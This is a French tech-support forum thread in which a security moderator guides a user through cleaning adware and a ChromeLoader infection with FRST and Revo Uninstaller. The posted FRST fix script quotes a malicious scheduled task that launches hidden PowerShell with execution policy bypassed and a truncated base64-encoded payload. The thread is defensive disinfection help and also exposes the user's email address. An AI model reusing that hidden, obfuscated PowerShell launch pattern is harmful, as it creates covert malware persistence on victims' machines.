Powershell s’ouvre tout seul
Résolu/Fermé
Natcgn
-
bazfile Messages postés 58560 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
bazfile Messages postés 58560 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
A voir également:
- Windows powershell s'ouvre tout seul
- Clé windows 8 - Guide
- Montage video windows - Guide
- Windows ne démarre pas - Guide
- Windows movie maker - Télécharger - Montage & Édition
- Restauration systeme windows 10 - Guide
6 réponses
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser


À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition, .
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention de bien attendre que les messages disant que l'analyse est terminée s'affichent

À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition, .

Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Le rapport "Addition" est incomplet.
Ton pc est très infecté, il va falloir être plus prudente et éviter de cliquer à tout va.
Tu as le navigateur Yandex est-ce toi qui l'a installé ?
Procédure à faire dans l'ordre indiqué :
En premier désinstalle les logiciels suivants avec RevoUninstaller en mode scan avancé :





2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis :
Ton pc est très infecté, il va falloir être plus prudente et éviter de cliquer à tout va.
Tu as le navigateur Yandex est-ce toi qui l'a installé ?
Procédure à faire dans l'ordre indiqué :
En premier désinstalle les logiciels suivants avec RevoUninstaller en mode scan avancé :
- CleanMyPC
- Segurazo Realtime Protection Lite
- SSOption
- Wondershare Helper Compact
Tutoriel Revo Uninstaller à lire attentivement.



Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.

Cocher "Scan avancé" puis cliquer sur "Scan".

Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.
Désinfection.
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
HKLM\SOFTWARE\Policies\Google: Restriction
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
Task: {1C4A1181-1E34-490E-A191-39D3E6AA0FB2} - System32\Tasks\Opera scheduled Autoupdate 1588591720 => C:\Users\alexc\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Pas de fichier)Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Pas de fichier)
Task: {7E11B7E3-6BA9-4753-B443-CB4AC970CEFC} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate (Pas de fichier)
Task: {99423343-A9BE-485F-8348-8E1B4DC190C2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus).
Edge HomeButtonPage: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/yhs/search?hspart=ner&hsimp=yhs-001&type=aee_84d015defd161c9282¶m1=ArFaIWJoNqArQGMVADwgQGR7B7NoN9InxrFbMmYsQGMVw7ofB6poNqAqAXFaIWQBvmE4ICILNopcGWUIvmFdICIVNVI4ISoVNVE4J6k4NVQ3vqYXNVBdJ6IWwVM3vCILNVJdESk8NUM9Jmk3vmk3vCILNFdbDSk8vFE9ImoVvFQ9ImIVwVA3vCoXwV5cGWUWvmFcJmoUNEA3vCILNFdcIaUXNEBcGqQANFdcFCk8NoM9JGYXwVM3vGYXvmo9ISoUwVw9JGYYvFJdISISNVJdJGYTvFI9I6IYwVVdJ6IVwVw4JaYVvmpdJCIVwVI9JaYUwVM9ISIVvFRbFCILNF9cIqUXNolcEqULNopcGWUIvmFbF6IYwVVcG6IXvFM4ICoWwVQ9I6k4vmpcFCIVwVw4IGUJvFI9J6ISNEM4JmoWwVM9I6k3wVNcFSIYwVQ3vmoVNEY4JaUIwVQ4JaQIwV5dJGYNvmE4ICILNFRbDqUDNEJcFaULvmE9GqUINolcJqUJNEQ3wCIWvFI4JmoVwVI4ISk4wVU4ISIWQGR7B6RoN9J8LWZ6MWZcMWZoNqAsQGMVvDIlC6MuNGouNasuwCYpC7EmyCYbxU1dNU1dNXFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJpseyDF%3D¶m2=MGN9NqF6Matb&p={searchTerms}
Edge DefaultSearchKeyword: Default -> search by yahoo
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
FF SearchPlugin: C:\Users\alexc\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\searchplugins\yandex.ru-20202315.xml [2020-11-15]
CHR Notifications: Default -> hxxps://app.slack.com; hxxps://aternos.org; hxxps://download-alert.com; hxxps://maviedechat.net; hxxps://p4.maranhesduve.club; hxxps://padlet.com; hxxps://personal-video.live; hxxps://qbqra.mybuzz.fun; hxxps://tvplusnewtab.com; hxxps://userscloud.com; hxxps://www.marmiton.org; hxxps://www.serials.ws; hxxps://www1a.debrahinton.pro; hxxps://www1a.ramirocampos.pro; hxxps://www51.zippyshare.com
CHR HomePage: Default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_secureddownload_16_48_ssg02¶m1=1¶m2=f%3D1%26b%3Dchmm%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCyD0CyDyD0BtDtD0FtC0B0CyEtN0D0Tzu0StCyBzyyEtN1L2XzutAtFtByDtFtCtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0B0D0BtByC0EzztGyDtD0CzytG0CzyzztCtGtD0D0AyCtG0B0A0DtBtByBtB0AtAtDtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0AyCzy0BtD0FyBtGtCtD0BtDtGyEtD0AyBtGzz0ByC0AtGtC0FtAtAzzyCtDtByBtA0AyB2QtN0A0LzuyE%26cr%3D1050113949%26a%3Dwnf_secureddownload_16_48_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
CHR HKLM\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKLM\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKLM-x32\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]
CHR HKLM-x32\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf]
2022-01-08 22:22 - 2022-01-08 22:22 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2022-01-08 15:58 - 2022-01-08 15:58 - 000108784 _____ C:\Users\alexc\AppData\Roaming\whw.exe
2022-01-08 15:58 - 2022-01-08 15:58 - 000012288 _____ C:\Users\alexc\AppData\Roaming\e3dwefw.exe
S2 InnocentKalaga; C:\Program Files (x86)\InnocentKalaga\InnocentKalaga.exe [5948912 2018-04-05] (Apps Delivered Ltd -> Innocent Kalaga) [Fichier non signé]
YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1722835910-503718021-2123007925-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yandex.ru/?win=463&clid=2341035-18
SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> DefaultScope b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
cmd: netsh advfirewall reset
Hosts:
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

IMPORTANT une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.IMPORTANT :
5- Réinitialise Google Chrome avec CE LOGICIEL.Puis :
6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
POUR INFORMATION:
Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps, si tu as un pc portable branche-le au secteur, car ce serait dommage de tomber en panne de batterie avant que la mise à jour ne soit terminée.
Dans ce cas une fois la procédure précédente précédente terminée, pour supprimer Yandex fait une nouvelle correction FRST avec ce script :
Start::
CreateRestorePoint:
CloseProcesses:
C:\Users\alexc\AppData\Local\Yandex
YAN Profile: C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default [2020-11-15]
YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
End::
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question